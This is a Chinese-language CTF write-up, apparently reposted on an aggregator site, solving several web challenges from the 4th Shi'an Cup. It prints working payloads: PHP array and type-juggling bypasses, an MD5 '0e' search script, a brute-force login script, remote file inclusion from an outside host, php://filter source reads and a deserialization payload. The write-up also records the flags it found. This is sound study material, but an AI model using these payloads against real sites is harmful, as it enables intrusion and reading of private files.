[第四屆世安杯](web)writeup

時間  2019-11-11
標籤 四屆 web writeup 欄目 Android 简体版
原文   原文鏈接

ctf入門級題目

<?php
$flag = '*********';

if (isset ($_GET['password'])) {
    if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
        echo '<p class="alert">You password must be alphanumeric</p>';
    else if (strpos ($_GET['password'], '--') !== FALSE)
        die($flag);
    else
        echo '<p class="alert">Invalid password</p>';
}
?>

<section class="login">
        <div class="title">
                <a href="./index.phps">View Source</a>
        </div>

        <form method="POST">
                <input type="text" required name="password" placeholder="Password" /><br/>
                <input type="submit"/>
        </form>
</section>
</body>
</html>

利用ereg和strops處理數組的漏洞,提交?password[]=1php

flag{Maybe_using_rexpexp_wasnt_a_clever_move}html

曲奇餅

觀察連接,file後面是一個base64,解碼爲key.txt並無什麼用。將index.phpbase64,而後不斷修改line讀取源碼。json

<?php
error_reporting(0); 
$file=base64_decode(isset($_GET['file'])?$_GET['file']:""); 
$line=isset($_GET['line'])?intval($_GET['line']):0; 
if($file=='') header("location:index.php?line=&file=a2V5LnR4dA=="); 
$file_list = array( 
'0' =>'key.txt', 
'1' =>'index.php', 
); 
if(isset($_COOKIE['key']) && $_COOKIE['key']=='li_lr_480'){ 
$file_list[2]='thisis_flag.php'; 
} 
if(in_array($file, $file_list)){ 
$fa = file($file); 
echo $fa[$line]; 
} 
?>

view-source:http://ctf1.shiyanbar.com/shian-quqi/index.php?line=&file=dGhpc2lzX2ZsYWcucGhw數組

flag{UHGgd3rfH*(3HFhuiEIWF}ui

類型

<?php
show_source(__FILE__);
$a=0;
$b=0;
$c=0;
$d=0;
if (isset($_GET['x1']))
{
        $x1 = $_GET['x1'];
        $x1=="1"?die("ha?"):NULL;
        switch ($x1)
        {
        case 0:
        case 1:
                $a=1;
                break;
        }
}
$x2=(array)json_decode(@$_GET['x2']);
if(is_array($x2)){
    is_numeric(@$x2["x21"])?die("ha?"):NULL;
    if(@$x2["x21"]){
        ($x2["x21"]>2017)?$b=1:NULL;
    }
    if(is_array(@$x2["x22"])){
        if(count($x2["x22"])!==2 OR !is_array($x2["x22"][0])) die("ha?");
        $p = array_search("XIPU", $x2["x22"]);
        $p===false?die("ha?"):NULL;
        foreach($x2["x22"] as $key=>$val){
            $val==="XIPU"?die("ha?"):NULL;
        }
        $c=1;
}
}
$x3 = $_GET['x3'];
if ($x3 != '15562') {
    if (strstr($x3, 'XIPU')) {
        if (substr(md5($x3),8,16) == substr(md5('15562'),8,16)) {
            $d=1;
        }
    }
}
if($a && $b && $c && $d){
    include "flag.php";
    echo $flag;
}
?>

最後:
x1=1a&x2={"x21":"2018a","x22":[[0],0]}&x3=XIPU18570this

繞過x3的腳本url

import hashlib

for i in xrange(1000000):
    s = 'XIPU' + str(i)
    mymd5 = hashlib.md5()
    mymd5.update(s)
    mymd5 = mymd5.hexdigest()
    flag = 1
    if mymd5[8:10] == '0e':
        for j in mymd5[10:24]:
            if j.isalpha():
                flag = 0
                break
        if flag == 1:
            print s
            break

CTF{Php_1s_bstl4_1a}code

登陸

源碼提示:<!-- 據說密碼是一個五位數字 -->,那就直接進行爆破好了orm

import requests
import re

s = requests.Session()


def get_rancode():
    response = s.get("http://ctf1.shiyanbar.com/shian-s/index.php")
    html = response.text
    regex = re.compile('\d\d\d')
    code = regex.findall(html)
    return code[0]

if __name__ == '__main__':
    for password in range(9999, 99999):
        code = get_rancode()
        url = "http://ctf1.shiyanbar.com/shian-s/index.php?username=admin&password={}&randcode={}".format(
            str(password), code)
        proxy={"http":"http://127.0.0.1:8080"}
        response = s.get(url)
        text = response.text

        if "flag" in text:
            print url
            break

腳本哪錯了?沒跑出來,不懂htm

admin

$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];

if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
    echo "hello admin!<br>";
    include($file); //class.php
}else{
    echo "you are not admin ! ";

讀取class.php:

http://ctf1.shiyanbar.com/shian-du/index.php?user=http://120.27.32.227/3.txt&file=php://filter/convert.base64-encode/resource=class.php&pass=1

<?php

class Read{//f1a9.php
    public $file;
    public function __toString(){
        if(isset($this->file)){
            echo file_get_contents($this->file);    
        }
        return "__toString was called!";
    }
}

讀取index.php:

<?php
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];

if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
    echo "hello admin!<br>";
    if(preg_match("/f1a9/",$file)){
        exit();
    }else{
        include($file); //class.php
        $pass = unserialize($pass);
        echo $pass;
    }
}else{
    echo "you are not admin ! ";
}

?>

<!--
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];

if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
    echo "hello admin!<br>";
    include($file); //class.php
}else{
    echo "you are not admin ! ";
}

再經過序列化讀取flag:

http://ctf1.shiyanbar.com/shian-du/index.php?user=http://120.27.32.227/3.txt&file=class.php&pass=O:4:"Read":1:{s:4:"file";s:57:"php://filter/read=convert.base64-encode/resource=f1a9.php";}

哦豁。。第一個也能夠用php://input 而不是遠程包含繞過

flag_Xd{hSh_ctf:e@syt0g3t}

小記:emm....這種水平的比賽...確實對於某些水平來是浪費時間...感受本身到了一個瓶頸,難的比賽又不會,一些比較簡單的所獲甚微。哎....仍是要學啊

相關文章
相關標籤/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公眾號
   歡迎關注本站公眾號,獲取更多信息
聯繫我們 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程